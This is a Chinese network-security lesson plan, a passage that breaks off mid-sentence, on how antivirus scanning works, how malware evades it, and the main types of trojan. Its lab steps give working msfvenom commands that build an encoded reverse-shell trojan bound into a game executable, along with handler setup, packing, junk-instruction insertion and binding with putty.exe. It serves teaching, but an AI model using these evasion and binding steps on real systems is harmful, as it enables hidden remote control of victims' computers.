網(wǎng)絡(luò)安全技術(shù)實(shí)踐教程（微課版）-教案 病毒與木馬的認(rèn)知與防護(hù)

《網(wǎng)絡(luò)安全技術(shù)實(shí)踐教程》教案授課單位：授課時(shí)間：授課班級(jí)：授課教師：年月日教案8（第8號(hào)/17號(hào)）課程名稱(chēng)網(wǎng)絡(luò)安全授課日期、節(jié)次班級(jí)課堂類(lèi)型理論+實(shí)踐地點(diǎn)章節(jié)（任務(wù)）名稱(chēng)任務(wù)4.1病毒免殺任務(wù)4.2木馬教學(xué)目標(biāo)知識(shí)目標(biāo)1.理解病毒、木馬等惡意軟件的基本概念及其對(duì)信息系統(tǒng)的危害。2.掌握常見(jiàn)的病毒查殺技術(shù)原理，包括文件掃描、內(nèi)存掃描、行為監(jiān)控和云端查殺等方法。3.熟悉不同病毒掃描技術(shù)（如字符串掃描、通配符掃描、智能掃描、骨架掃描等）的具體應(yīng)用場(chǎng)景及其優(yōu)缺點(diǎn)。能力目標(biāo)1.能夠根據(jù)不同病毒特征選擇合適的查殺技術(shù)并進(jìn)行有效檢測(cè)與防護(hù)。2.能分析常見(jiàn)病毒免殺手段，并提出針對(duì)性的防護(hù)與應(yīng)對(duì)措施。3.能在實(shí)際工作中部署、配置并優(yōu)化殺毒軟件，定期更新病毒庫(kù)，提升系統(tǒng)安全防護(hù)能力。4.能夠生成并部署木馬程序，模擬真實(shí)攻擊環(huán)境。素質(zhì)目標(biāo)1.樹(shù)立主動(dòng)防御意識(shí)，認(rèn)識(shí)到持續(xù)監(jiān)測(cè)和病毒防護(hù)在信息安全中的重要性。2.培養(yǎng)細(xì)致嚴(yán)謹(jǐn)?shù)墓ぷ鲬B(tài)度，能在日常運(yùn)維中堅(jiān)持執(zhí)行病毒查殺與防護(hù)規(guī)范。學(xué)情分析授課對(duì)象：計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)專(zhuān)業(yè)學(xué)生，包括中職與普高混合班。學(xué)生特點(diǎn)：計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)專(zhuān)業(yè)學(xué)生，基礎(chǔ)知識(shí)存在差異，需針對(duì)性講解與實(shí)踐操作結(jié)合。學(xué)習(xí)習(xí)慣：偏愛(ài)實(shí)踐性強(qiáng)的課程，理論學(xué)習(xí)興趣較低。樂(lè)于通過(guò)案例和互動(dòng)式教學(xué)理解知識(shí)點(diǎn)。重難點(diǎn)分析教學(xué)重點(diǎn)1.病毒查殺技術(shù)的基本原理，包括文件掃描、內(nèi)存掃描、行為監(jiān)控和云端查殺的具體過(guò)程。2.常見(jiàn)病毒掃描技術(shù)（字符串掃描、通配符掃描、智能掃描、骨架掃描等）的工作機(jī)制及應(yīng)用。3.CobaltStrike監(jiān)聽(tīng)器配置與木馬生成過(guò)程教學(xué)難點(diǎn)1.病毒免殺技術(shù)的實(shí)現(xiàn)原理（如殼技術(shù)、加密、混淆、特征隱藏等），及其對(duì)傳統(tǒng)查殺手段的挑戰(zhàn)。2.查殺技術(shù)中智能掃描與骨架掃描方法的深入理解及實(shí)際應(yīng)用分析。3.病毒行為監(jiān)控與傳統(tǒng)特征碼掃描之間的關(guān)系與互補(bǔ)性分析。信息化應(yīng)用方法通過(guò)課件、視頻、案例分析、互動(dòng)提問(wèn)等多種信息化方式，借助學(xué)習(xí)通平臺(tái)發(fā)布學(xué)習(xí)資源和任務(wù)，學(xué)生自主學(xué)習(xí)并完成任務(wù)。課程思政元素1.網(wǎng)絡(luò)安全事關(guān)國(guó)家安全，培養(yǎng)學(xué)生的家國(guó)情懷與責(zé)任感。2.樹(shù)立服務(wù)意識(shí)，塑造職業(yè)精神，使學(xué)生形成運(yùn)用所學(xué)專(zhuān)業(yè)知識(shí)為社會(huì)貢獻(xiàn)的責(zé)任感。3.鍛煉學(xué)生實(shí)事求是的工作態(tài)度，培養(yǎng)學(xué)生嚴(yán)謹(jǐn)細(xì)致的工作作風(fēng)、精益求精的工匠精神。教學(xué)實(shí)施過(guò)程課前：平臺(tái)發(fā)布病毒與木馬的認(rèn)知與防護(hù)任務(wù)1學(xué)習(xí)任務(wù)，學(xué)生預(yù)習(xí)。課中：導(dǎo)入新課某公司突然發(fā)現(xiàn)其內(nèi)部網(wǎng)絡(luò)頻繁出現(xiàn)異常，數(shù)據(jù)傳輸速率異常緩慢，部分敏感文件似乎遭到未授權(quán)訪(fǎng)問(wèn)。眾智科技接到該公司委托后立即成立專(zhuān)項(xiàng)應(yīng)急小組，對(duì)相關(guān)流量進(jìn)行分析，初步懷疑，這些情況可能由一種新型病毒所導(dǎo)致。該病毒以隱藏自身蹤跡見(jiàn)長(zhǎng)，能夠悄無(wú)聲息地在企業(yè)網(wǎng)絡(luò)中橫向擴(kuò)散，竊取重要信息，并可能對(duì)關(guān)鍵系統(tǒng)構(gòu)成威脅。經(jīng)過(guò)專(zhuān)項(xiàng)應(yīng)急小組緊急處理后，公司的網(wǎng)絡(luò)恢復(fù)了正常。眾智科技深知病毒木馬可能對(duì)客戶(hù)信息系統(tǒng)帶來(lái)嚴(yán)重威脅，通過(guò)為客戶(hù)網(wǎng)絡(luò)維護(hù)部門(mén)講解和演示病毒免殺，使客戶(hù)網(wǎng)絡(luò)維護(hù)部門(mén)了解了病毒如何逃避殺毒軟件的查殺。因此，在接下來(lái)的日常系統(tǒng)安全管理過(guò)程中，殺毒軟件的安裝及定期升級(jí)病毒庫(kù)成為客戶(hù)網(wǎng)絡(luò)維護(hù)部門(mén)日常信息安全維護(hù)的必要工作之一。任務(wù)一知識(shí)點(diǎn)講解一.病毒查殺方式及原理從計(jì)算機(jī)科學(xué)角度來(lái)看，病毒是一種惡意軟件，它能在未經(jīng)授權(quán)的情況下傳播、感染計(jì)算機(jī)系統(tǒng)，并對(duì)系統(tǒng)功能進(jìn)行破壞，竊取數(shù)據(jù)，或者進(jìn)行其他非法操作。病毒查殺是指通過(guò)殺毒軟件或其他安全工具檢測(cè)、識(shí)別并清除計(jì)算機(jī)系統(tǒng)中的病毒、木馬及其他惡意軟件的過(guò)程。這一過(guò)程通?；谝韵聨追N技術(shù)。1．基于文件掃描的反病毒技術(shù)（1）第一代掃描技術(shù)第一代掃描技術(shù)的核心是在文件中檢索病毒特征序列。該技術(shù)雖然出現(xiàn)得比較早，但是直到現(xiàn)在仍然被多家殺毒廠(chǎng)商所使用，其主要代表為“字符串掃描技術(shù)”和“通配符掃描技術(shù)”。字符串掃描技術(shù)：使用從病毒中提取出來(lái)的具有一定特征的一段字符（特征碼）來(lái)檢測(cè)病毒，該段字符在一般程序中不太可能出現(xiàn)。例如，一個(gè)隱藏執(zhí)行格式化所有硬盤(pán)的命令不太可能出現(xiàn)在一般程序中，可以將其作為特征碼。通配符掃描技術(shù)：由于字符串掃描技術(shù)有執(zhí)行速度與特征碼長(zhǎng)度的限制，所以正在逐漸被通配符掃描技術(shù)取代。當(dāng)前反病毒軟件中的簡(jiǎn)單掃描器通常支持通配符。掃描器中的通配符一般用于跳過(guò)某些字節(jié)或字節(jié)范圍，而隨著技術(shù)的發(fā)展，現(xiàn)在大多數(shù)掃描器已經(jīng)支持正則表達(dá)式。（2）第二代掃描技術(shù)第二代掃描技術(shù)以“近似精確識(shí)別法”和“精確識(shí)別法”為代表，除此之外還有“智能掃描法”與“骨架掃描法”，第二代掃描技術(shù)與第一代掃描技術(shù)相比，對(duì)檢測(cè)精度提出了更嚴(yán)格的要求。（1）近似精確識(shí)別法：采用兩個(gè)或更多的字符集來(lái)檢測(cè)每個(gè)病毒，如果掃描器檢測(cè)到其中一個(gè)特征符合，就會(huì)警告發(fā)現(xiàn)病毒變種，但不會(huì)針對(duì)病毒執(zhí)行下一步操作。如果多個(gè)特征碼全部符合，則會(huì)報(bào)警發(fā)現(xiàn)病毒并執(zhí)行下一步操作。（2）精確識(shí)別法：作為最嚴(yán)格的識(shí)別方法之一，精確識(shí)別法確保了對(duì)病毒變種的精準(zhǔn)匹配。它不僅基于傳統(tǒng)的校驗(yàn)和，還可能整合了更復(fù)雜的算法，如全病毒體校驗(yàn)和生成特征圖。這種方法要求對(duì)病毒的每一個(gè)字節(jié)都進(jìn)行精確匹配，盡管這可能導(dǎo)致更高的計(jì)算成本，但它提供了較高級(jí)別的檢測(cè)確定性，常與其他掃描技術(shù)結(jié)合使用，以達(dá)到最佳防護(hù)效果。（3）智能掃描法：忽略檢測(cè)文件中類(lèi)似NOP等無(wú)意義的指令，而對(duì)于文本格式的腳本病毒和宏病毒，則可以替換多余的格式字符，如空格符、換行符或制表符等。所有的替換動(dòng)作均在掃描緩沖區(qū)中執(zhí)行，大大提高了掃描器的檢測(cè)能力。（4）骨架掃描法：由卡巴斯基公司發(fā)明，在檢測(cè)宏病毒時(shí)效果特別顯著。該方法沒(méi)有使用特征碼和校驗(yàn)和，而是逐行解析宏語(yǔ)句，丟棄所有非必要字符，只保留代碼的骨架，并對(duì)代碼骨架進(jìn)行進(jìn)一步的分析，在一定程度上提高了對(duì)病毒變種的檢測(cè)能力。2．基于內(nèi)存掃描的反病毒技術(shù)內(nèi)存掃描器通常與實(shí)時(shí)監(jiān)控系統(tǒng)緊密集成，協(xié)同工作，以提供實(shí)時(shí)保護(hù)。它們能夠在病毒或惡意軟件執(zhí)行前或執(zhí)行過(guò)程中及時(shí)發(fā)現(xiàn)并阻止?jié)撛谕{。由于程序加載到內(nèi)存中后，其結(jié)構(gòu)和磁盤(pán)上的原始文件結(jié)構(gòu)相比可能會(huì)發(fā)生變化，包括代碼重定位、動(dòng)態(tài)鏈接庫(kù)的加載、數(shù)據(jù)段的初始化等，這些變化要求內(nèi)存掃描器采用不同的策略。這意味著內(nèi)存掃描使用的特征碼往往與文件掃描的不同，需要針對(duì)內(nèi)存中代碼的特性定制開(kāi)發(fā)，以便更有效地識(shí)別已加載或正在執(zhí)行的惡意代碼。內(nèi)存掃描的一個(gè)重要優(yōu)勢(shì)在于其能夠即時(shí)響應(yīng)。當(dāng)病毒或惡意軟件嘗試在內(nèi)存中初始化、修改系統(tǒng)設(shè)置、注入其他進(jìn)程或執(zhí)行其他惡意行為時(shí)，內(nèi)存掃描器能夠迅速捕獲這些活動(dòng)，及時(shí)阻止惡意代碼的進(jìn)一步執(zhí)行，從而降低系統(tǒng)被侵害的風(fēng)險(xiǎn)。與靜態(tài)文件掃描相比，內(nèi)存掃描更側(cè)重于動(dòng)態(tài)分析，即在代碼執(zhí)行過(guò)程中分析其行為。這種分析能夠揭示更多關(guān)于惡意軟件意圖的信息，比如網(wǎng)絡(luò)連接請(qǐng)求、系統(tǒng)資源的異常訪(fǎng)問(wèn)模式等，這些都是文件掃描難以直接捕獲的。3．基于行為監(jiān)控的反病毒技術(shù)此類(lèi)反病毒技術(shù)一般需要和虛擬機(jī)與主動(dòng)防御等技術(shù)配合使用。其核心原理是在受控的虛擬環(huán)境中動(dòng)態(tài)執(zhí)行可疑代碼，同時(shí)運(yùn)用復(fù)雜的算法模型分析程序行為序列，并將其與龐大數(shù)據(jù)庫(kù)中的已知惡意行為模式進(jìn)行比對(duì)。4．基于新興技術(shù)的反病毒技術(shù)（1）云端查殺技術(shù)：云端查殺實(shí)踐了“集體智慧，協(xié)同防御”的原則，代表了反病毒領(lǐng)域的一大突破。該技術(shù)依托于強(qiáng)大的服務(wù)器中樞與廣泛分布的用戶(hù)終端所形成的網(wǎng)絡(luò)，使服務(wù)器能實(shí)時(shí)監(jiān)測(cè)各用戶(hù)的狀態(tài)。一旦檢測(cè)到個(gè)體異常，其能迅速部署檢查并隔離問(wèn)題，有效阻止威脅擴(kuò)散。此過(guò)程依賴(lài)于用戶(hù)群體的行為模式作為基線(xiàn)，例如，若多數(shù)設(shè)備已安全運(yùn)行某軟件，則新設(shè)備運(yùn)行該軟件亦被視為安全。反之，則觸發(fā)警報(bào)并介入防護(hù)。（2）信任鏈繼承機(jī)制：構(gòu)建于云端的復(fù)雜信任架構(gòu)，融合用戶(hù)反饋、專(zhuān)家分析、自動(dòng)化評(píng)估及數(shù)字簽名驗(yàn)證等多維度信任體系。其核心是“根可信進(jìn)程”，根可信進(jìn)程作為信任鏈的起源點(diǎn)，確保其衍生的子進(jìn)程均被賦予信任。例如，經(jīng)數(shù)字簽名驗(yàn)證的進(jìn)程A執(zhí)行時(shí)無(wú)阻，其衍生的子進(jìn)程亦自動(dòng)獲得信任；而未經(jīng)驗(yàn)證的進(jìn)程B，則面臨嚴(yán)格監(jiān)控，其有任何可疑行為都將立即上報(bào)分析，從而持續(xù)拓展云端信任網(wǎng)絡(luò)的深度與廣度。（3）分布式防御協(xié)作：利用云計(jì)算與病毒傳播的分布式特性，實(shí)現(xiàn)對(duì)病毒事件的快速響應(yīng)。每一起新病毒事件，都能迅速被上傳至云端，經(jīng)分析處理后，全網(wǎng)范圍內(nèi)的設(shè)備即時(shí)獲得防護(hù)升級(jí)，大大提升了對(duì)新威脅的捕捉效率和覆蓋面。（4）多引擎聯(lián)合查殺：該技術(shù)通過(guò)同時(shí)調(diào)用兩個(gè)或更多反病毒引擎進(jìn)行掃描，顯著提升檢測(cè)精度。反病毒解決方案通常允許用戶(hù)靈活選擇掃描模式，針對(duì)不同引擎采取策略，這要求免殺技術(shù)需針對(duì)每個(gè)引擎特性逐一突破，增加了惡意軟件逃避檢測(cè)的難度。二、病毒免殺技術(shù)免殺技術(shù)是惡意軟件開(kāi)發(fā)者用來(lái)逃避查殺機(jī)制的一系列策略和技術(shù)，從而確保其惡意代碼能夠在受保護(hù)的系統(tǒng)中運(yùn)行而不被發(fā)現(xiàn)或阻止，常見(jiàn)的免殺技術(shù)如下。1．修改特征碼所謂特征碼，就是指防毒軟件從病毒樣本中提取的長(zhǎng)度不超過(guò)64字節(jié)且能代表病毒特征的十六進(jìn)制代碼，主要有單一特征碼、多重特征碼和復(fù)合特征碼這3種類(lèi)型。殺毒軟件在工作時(shí)，使用了檢測(cè)病毒特征碼的概念，那么惡意軟件開(kāi)發(fā)者可以通過(guò)修改病毒特征碼的方式躲過(guò)殺毒軟件的掃描。2．花指令免殺花指令免殺是指通過(guò)插入無(wú)意義或具有混淆性質(zhì)的代碼片段，即“花指令”，來(lái)干擾反匯編過(guò)程和反病毒軟件的靜態(tài)分析，從而達(dá)到隱藏惡意代碼真實(shí)邏輯的目的。其主要思想是通過(guò)在程序入口點(diǎn)或關(guān)鍵代碼段前插入看似無(wú)關(guān)緊要的指令序列，使得反匯編工具難以直接揭示程序的真實(shí)功能，從而增加分析難度。其具體實(shí)現(xiàn)包括利用jmp、call和ret等指令改變程序的執(zhí)行流程，使程序的實(shí)際起始點(diǎn)或重要邏輯分支不易被追蹤，通過(guò)復(fù)雜的堆棧指令，如壓棧、彈棧指令，進(jìn)一步擾亂代碼的邏輯路徑，使分析人員難以通過(guò)直觀(guān)的反匯編代碼理解程序行為；使用計(jì)算和條件轉(zhuǎn)移指令對(duì)關(guān)鍵地址或數(shù)據(jù)進(jìn)行間接引用，使關(guān)鍵代碼的位置和用途更加隱蔽。3．加殼免殺加殼的本質(zhì)是在外部包裹一層代碼，以此來(lái)改變軟件的原始面貌，實(shí)現(xiàn)對(duì)軟件的保護(hù)、壓縮或加密。殼就是軟件所增加的保護(hù)，其并不會(huì)破壞軟件內(nèi)部結(jié)構(gòu)。當(dāng)運(yùn)行這個(gè)加殼的程序時(shí)，系統(tǒng)首先會(huì)運(yùn)行程序里的殼，然后由殼將加密的程序逐步還原到內(nèi)存中，最后運(yùn)行程序。加殼雖然對(duì)于特征碼繞過(guò)有非常好的效果，基本上可以把特征碼全部掩蓋，但是其缺點(diǎn)也非常明顯，由于殼本身也具有一定的特征，某些反病毒軟件能夠直接識(shí)別出常見(jiàn)的殼類(lèi)型，從而觸發(fā)警報(bào)。一些專(zhuān)業(yè)的逆向工程師或高級(jí)的反病毒軟件能夠識(shí)別并移除加殼程序的外殼，暴露出其原始代碼。4．內(nèi)存免殺內(nèi)存免殺將惡意代碼（如病毒、木馬等）直接加載到內(nèi)存中，而不將其寫(xiě)入磁盤(pán)上的文件中，從而繞過(guò)傳統(tǒng)的基于文件的殺毒軟件檢測(cè)。惡意軟件常常利用系統(tǒng)漏洞或合法進(jìn)程，通過(guò)動(dòng)態(tài)庫(kù)注入、遠(yuǎn)程線(xiàn)程創(chuàng)建等手段，將惡意代碼片段插入正在運(yùn)行的合法應(yīng)用程序中執(zhí)行。在某些高級(jí)策略中，惡意軟件能夠在運(yùn)行時(shí)動(dòng)態(tài)修改自身的代碼結(jié)構(gòu)，采用代碼變形、多態(tài)性技術(shù)等，使得其內(nèi)存中的表示形式隨每次執(zhí)行而變化，這種動(dòng)態(tài)性會(huì)讓基于靜態(tài)特征碼的檢測(cè)工具失效。5．二次編譯二次編譯主要用于修改惡意軟件的源代碼，使其在經(jīng)過(guò)編譯后能夠躲避殺毒軟件的檢測(cè)。這種技術(shù)通常涉及對(duì)源代碼進(jìn)行反匯編、逆向工程和系統(tǒng)漏洞利用等高級(jí)黑客技術(shù)。攻擊者獲取惡意軟件的源代碼后，對(duì)其進(jìn)行修改，改變其特征或行為模式。經(jīng)過(guò)修改的源代碼需要被重新編譯成可執(zhí)行文件。編譯完成后，攻擊者會(huì)使用多種殺毒軟件對(duì)生成的可執(zhí)行文件進(jìn)行掃描測(cè)試，以驗(yàn)證其是否成功躲避了殺毒軟件的檢測(cè)。任務(wù)一實(shí)施步驟1.msf自捆綁加編碼（1）在Metasploit框架下實(shí)現(xiàn)免殺的方式之一是使用msf編碼器，即使用msf編碼器對(duì)制作的木馬進(jìn)行重新編碼，生成一個(gè)二進(jìn)制文件，這個(gè)文件運(yùn)行后，msf編碼器會(huì)將原始程序解碼到內(nèi)存中并執(zhí)行。在Kali終端輸入并執(zhí)行“msfvenom-lencoders”，可以列出所有可用的編碼方式，如圖4-1所示。圖4-1列出所有可用的編碼方式（2）使用msfvenom生成一個(gè)Windows環(huán)境下的木馬，并將其捆綁到wegame.exe（可以選擇任意.exe程序）上，生成名為wegame01.exe的合成馬。同時(shí)，對(duì)木馬進(jìn)行多次x86/shikata_ga_nai編碼以實(shí)現(xiàn)免殺處理。代碼如下。msfvenom-pwindows/meterpreter/reverse_tcplhost=28lport=4444

-ex86/shikata_ga_nai-x/var/tmp/wegame.exe-i12-fexe-o/var/tmp/wegame01.exe注意：在-e選項(xiàng)后可嘗試使用其他編碼方式。選項(xiàng)說(shuō)明如下。-p：攻擊載荷，用戶(hù)載入后滲透模塊Meterpreter反彈Shell。lhost：攻擊機(jī)IP地址。lport：攻擊機(jī)監(jiān)聽(tīng)端口。-e：指定需要使用的編碼器。-x：指定一個(gè)自定義的可執(zhí)行文件作為模板。-i：指定編碼次數(shù)。-f：指定輸出格式。-o：輸入payload。（3）使用指定方式進(jìn)行監(jiān)聽(tīng)，輸入代碼如下，效果如圖4-2所示。useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost28setlport4444run圖4-2使用指定方式進(jìn)行監(jiān)聽(tīng)（4）通過(guò)復(fù)制等方式將wegame01.exe文件放入靶機(jī)測(cè)試即可。圖4-3所示為運(yùn)行木馬之后的木馬上線(xiàn)效果。圖4-3木馬上線(xiàn)效果2．添加花指令（1）加花是病毒免殺的常用手段，加花以后，一些殺毒軟件就檢測(cè)不出病毒了，但是有些功能比較強(qiáng)的殺毒軟件還是能檢測(cè)出病毒的。這可以算是免殺技術(shù)中最初級(jí)的階段。使用msf編碼器生成常規(guī)木馬，如圖4-4所示。msfvenom-pwindows/shell_reverse_tcp-ax86--platformwindows

lhost=28lport=4444-fexe-o/var/tmp/abc.exe圖4-4生成常規(guī)木馬（1）使用牧馬游民工具對(duì)生成的abc.exe木馬進(jìn)行加花處理，將剛剛生成的木馬拖進(jìn)程序界面內(nèi)，選擇“花指令”，最后單擊“加花”按鈕即可對(duì)abc.exe添加花指令，如圖4-5所示。圖4-5添加花指令3．UPX加殼（1）軟件加殼也可以稱(chēng)為軟件加密（或軟件壓縮），只是加密（或壓縮）的方式與正常加密的目的不一樣。這里我們繼續(xù)使用前面步驟中msf編碼器生成的常規(guī)木馬。（2）使用UPXShell進(jìn)行加殼處理。將需要加殼的木馬添加進(jìn)軟件后，單擊“壓縮”選項(xiàng)卡中的“執(zhí)行！”按鈕，即可對(duì)木馬程序進(jìn)行加殼處理，如圖4-6所示。圖4-6UPX加殼4．文件捆綁（1）使用文件捆綁工具進(jìn)行捆綁（文件1為之前生成的木馬程序，文件2為正常程序），如圖4-7所示。（2）完成上一步操作后，打開(kāi)“捆綁文件”選項(xiàng)卡，單擊“執(zhí)行”按鈕就可以將之前生成的木馬程序與正常程序進(jìn)行捆綁，生成惡意程序，如圖4-8所示。將生成的惡意程序發(fā)送到靶機(jī)運(yùn)行，即可看到靶機(jī)被控制。圖4-7文件捆綁圖4-8生成惡意程序5．Golang編譯捆綁（1）在Golang環(huán)境中安裝該程序go1.21.6.windows-amd64.msi，軟件如圖4-9所示。圖4-9Golang安裝程序（2）軟件安裝完成后，需要配置環(huán)境變量。右擊“我的電腦”，在彈出的快捷菜單中選擇“屬性”，在打開(kāi)的窗口中單擊“高級(jí)系統(tǒng)設(shè)置”，在彈出的“系統(tǒng)屬性”對(duì)話(huà)框中單擊“環(huán)境變量”，在彈出的“環(huán)境變量”對(duì)話(huà)框的“系統(tǒng)變量”欄中雙擊“Path”變量，并在彈出的對(duì)話(huà)框中增加一條Golang的安裝位置信息，如圖4-10所示。圖4-10配置環(huán)境變量（3）配置完成后需要測(cè)試環(huán)境變量是否配置成功，在“命令提示符”窗口中執(zhí)行“goversion”查看軟件版本，如圖4-11所示。圖4-11測(cè)試環(huán)境變量是否配置成功（4）使用Golang編譯捆綁程序源代碼，生成“GoFileBinder.exe”。在“命令提示符”窗口中進(jìn)入放置源代碼文件的文件夾，使用“gobuildGoFileBinder.go”命令生成GoFileBinder.exe，如圖4-12所示。圖4-12生成GoFileBinder.exe（5）使用GoFileBinder.exe程序進(jìn)行文件捆綁。注意在此例中“abc.exe”為木馬程序，“putty.exe”為正常程序。在輸入并執(zhí)行GoFileBinder.exeabc.exeputty.exe命令后，在當(dāng)前文件夾中會(huì)生成“Yihsiwei.bat”這個(gè)批處理文件，如圖

4-13所示。圖4-13生成Yihsiwei.bat批處理文件（6）雙擊Yihsiwei.bat批處理文件，批處理會(huì)自動(dòng)生成捆綁后的木馬程序“Yihsiwei.exe”，如圖4-14所示。圖4-14生成捆綁木馬程序（7）接下來(lái)依舊使用msf編碼器中的監(jiān)聽(tīng)模塊以及對(duì)應(yīng)的payload完成上線(xiàn)。將Yihsiwei.exe文件放入靶機(jī)運(yùn)行。圖4-15所示為運(yùn)行木馬之后的木馬上線(xiàn)效果。圖4-15通過(guò)Golang編譯捆綁木馬上線(xiàn)效果任務(wù)2知識(shí)點(diǎn)講解一.木馬簡(jiǎn)介1．木馬的定義木馬（TrojanHorse），也稱(chēng)木馬病毒，是指通過(guò)特定的程序來(lái)控制另一臺(tái)計(jì)算機(jī)系統(tǒng)?！癟rojanHorse”一詞源自古希臘傳說(shuō)。在這個(gè)傳說(shuō)中，希臘軍隊(duì)圍攻特洛伊城多年未果，于是設(shè)計(jì)了一個(gè)巨大的木馬雕像，假裝撤退并將木馬雕像遺棄在特洛伊城門(mén)外。特洛伊人將木馬雕像視為戰(zhàn)利品帶入城內(nèi)，卻不知其中藏有希臘士兵。夜幕降臨時(shí)，藏匿的希臘士兵悄悄打開(kāi)城門(mén)，城外伏兵涌入，導(dǎo)致特洛伊城淪陷。因此，“TrojanHorse”（或簡(jiǎn)稱(chēng)“Trojan”）后來(lái)成為隱秘入侵或內(nèi)部破壞的代名詞，在現(xiàn)代尤其指代那些表面看似無(wú)害但實(shí)際上含有惡意代碼的計(jì)算機(jī)程序，即“木馬”。木馬與一般的病毒不同，它不會(huì)自我繁殖，也不會(huì)“刻意”地去感染其他文件，它通過(guò)偽裝自身來(lái)吸引用戶(hù)下載并執(zhí)行，向施種者提供打開(kāi)被種主機(jī)的門(mén)戶(hù)，使施種者可以任意毀壞、竊取被種主機(jī)的文件，甚至遠(yuǎn)程操控被種主機(jī)。2．木馬的運(yùn)行原理木馬是一種典型的C/S模式軟件，分為客戶(hù)端和服務(wù)器端。一般情況下，黑客需要將服務(wù)器端程序安裝到目標(biāo)主機(jī)上，在自己的計(jì)算機(jī)上運(yùn)行客戶(hù)端程序。如果黑客能夠通過(guò)木馬成功地控制目標(biāo)主機(jī)，就能在自己的計(jì)算機(jī)與目標(biāo)主機(jī)之間建立起一個(gè)TCP連接。按照連接建立方式的不同，木馬主要分為兩種類(lèi)型：正向連接木馬和反彈連接木馬。正向連接木馬的特點(diǎn)是目標(biāo)主機(jī)上固定開(kāi)放某個(gè)端口，然后由黑客主動(dòng)連接目標(biāo)主機(jī)。反彈連接木馬則是在黑客的計(jì)算機(jī)上固定開(kāi)放某個(gè)端口，然后由目標(biāo)主機(jī)主動(dòng)連接黑客的計(jì)算機(jī)。早期的木馬主要為正向連接木馬，這種木馬的最大缺點(diǎn)是：黑客要想連接目標(biāo)主機(jī)，必須先知道其IP地址。對(duì)于目前采用撥號(hào)上網(wǎng)的終端，IP屬于動(dòng)態(tài)IP。每次撥號(hào)后，終端IP都會(huì)更換用戶(hù)每次撥號(hào)后IP地址都會(huì)更換，這樣就算被黑客種了木馬，在目標(biāo)主機(jī)下次撥號(hào)的時(shí)候，黑客也會(huì)因找不到IP而丟失目標(biāo)主機(jī)。此外，對(duì)于目前廣泛采用的另外一種上網(wǎng)方式，即局域網(wǎng)通過(guò)NAT（NetworkAddressTranslation，網(wǎng)絡(luò)地址轉(zhuǎn)換）接入互聯(lián)網(wǎng)來(lái)說(shuō)，那些處于內(nèi)網(wǎng)的機(jī)器由于采用了私有IP地址，因而外界是無(wú)法直接訪(fǎng)問(wèn)它們的（即使被種了木馬也沒(méi)用），除非黑客與目標(biāo)主機(jī)處于同一個(gè)局域網(wǎng)中，否則無(wú)法現(xiàn)其建立連接。由于正向連接木馬存在一系列缺點(diǎn)，所以就產(chǎn)生了反彈連接木馬，灰鴿子正是反彈連接木馬的始祖。反彈連接木馬通過(guò)在黑客的計(jì)算機(jī)上開(kāi)啟固定端口，然后由目標(biāo)主機(jī)主動(dòng)連接黑客的計(jì)算機(jī)，克服了正向連接木馬的一系列缺點(diǎn)，無(wú)論目標(biāo)主機(jī)的IP地址如何變換，目標(biāo)主機(jī)都可以主動(dòng)連接到黑客的計(jì)算機(jī)。即使目標(biāo)主機(jī)處于內(nèi)網(wǎng)，由于內(nèi)網(wǎng)的機(jī)器是可以主動(dòng)訪(fǎng)問(wèn)外網(wǎng)的，所以目標(biāo)主機(jī)也可以連接到黑客的計(jì)算機(jī)。反彈連接木馬的不足在于要求黑客必須有固定的IP地址，否則目標(biāo)主機(jī)將無(wú)法找到黑客的計(jì)算機(jī)。解決這個(gè)問(wèn)題的方法之一是采用動(dòng)態(tài)域名技術(shù)，即黑客注冊(cè)一個(gè)域名，然后將域名對(duì)應(yīng)到自己的IP地址上，這樣，無(wú)論黑客的IP地址如何變換，目標(biāo)主機(jī)都可以通過(guò)動(dòng)態(tài)域名主動(dòng)連接到黑客的計(jì)算機(jī)。除了要解決動(dòng)態(tài)IP地址的問(wèn)題以外，反彈連接木馬還有一個(gè)要解決的難題，即如果黑客的計(jì)算機(jī)處于內(nèi)網(wǎng)，那么目標(biāo)主機(jī)仍然是無(wú)法主動(dòng)連接它的，這還要求處于內(nèi)網(wǎng)的黑客的計(jì)算機(jī)必須在內(nèi)網(wǎng)的出口路由器上做端口映射。雖然反彈連接木馬配置起來(lái)相對(duì)比較麻煩，但是由于其技術(shù)“相對(duì)先進(jìn)”目前的木馬絕大多數(shù)都是反彈連接木馬。二、木馬的常見(jiàn)類(lèi)型1．遠(yuǎn)程訪(fǎng)問(wèn)型木馬遠(yuǎn)程控制是現(xiàn)代木馬的基本功能，木馬會(huì)設(shè)法與用戶(hù)計(jì)算機(jī)建立連接，隨后通過(guò)遠(yuǎn)程下發(fā)命令來(lái)實(shí)現(xiàn)遠(yuǎn)程抓取、文件傳輸、屏幕截取等功能。典型代表有灰鴿子、冰河等。2．盜取密碼型木馬這類(lèi)木馬以找到所有的隱藏密碼為目標(biāo)，如各種社交賬號(hào)和密碼、網(wǎng)絡(luò)游戲中的游戲密碼，并在受害者不知情的情況下將密碼信息發(fā)送出去。典型代表有Wirenet等。3．記錄鍵值型木馬記錄鍵值型木馬顧名思義就是記錄用戶(hù)每一次敲擊鍵盤(pán)操作的木馬。這類(lèi)木馬會(huì)隨著操作系統(tǒng)的啟動(dòng)而自動(dòng)加載，分為在線(xiàn)和離線(xiàn)兩種類(lèi)型，分別記錄用戶(hù)在在線(xiàn)和離線(xiàn)兩種狀態(tài)下敲擊鍵盤(pán)的信息。記錄鍵值型木馬一般也具有郵件發(fā)送功能，能通過(guò)郵件將記錄的信息發(fā)送給控制者。典型代表有MagicLantern、鍵盤(pán)記錄器木馬變種EOM等。4．DDoS攻擊型木馬攻擊者通過(guò)木馬程序控制被感染的主機(jī)，這些被感染的主機(jī)稱(chēng)為“目標(biāo)主機(jī)”。攻擊者通過(guò)控制大量目標(biāo)主機(jī)發(fā)起DDoS（DistributedDenialofService，分布式拒絕服務(wù)）攻擊。例如，當(dāng)攻擊者針對(duì)某個(gè)網(wǎng)站發(fā)起DDoS攻擊時(shí)，會(huì)導(dǎo)致該網(wǎng)站的服務(wù)器資源被大量占用，無(wú)法正常為用戶(hù)提供服務(wù)。典型代表有SatanDDoS僵尸網(wǎng)絡(luò)木馬、魔鼬等。5．網(wǎng)銀木馬網(wǎng)銀木馬主要針對(duì)銀行的網(wǎng)上交易系統(tǒng)，該木馬旨在竊取用戶(hù)的銀行賬戶(hù)信息，包括銀行賬號(hào)和密碼信息，給個(gè)人財(c